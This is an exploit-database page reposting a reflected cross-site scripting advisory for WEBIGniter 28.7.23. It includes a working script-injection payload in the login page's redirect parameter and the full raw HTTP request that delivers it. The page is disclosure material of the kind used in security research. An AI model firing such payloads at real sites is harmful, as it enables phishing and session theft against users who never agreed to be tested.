CVE Category Price Severity
- CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Not specified High Remote 2023-09-05

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

## Title: WEBIGniter-28.7.23-XSS-Reflected 
## Author: nu11secur1ty
## Date: 09/04/2023
## Vendor:
## Software:
## Reference:

## Description:
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login, which is very nasty and DANGEROUS!

## Staus: HIGH Vulnerability

GET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76w HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0


## Reproduce:

## Proof and Exploit

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.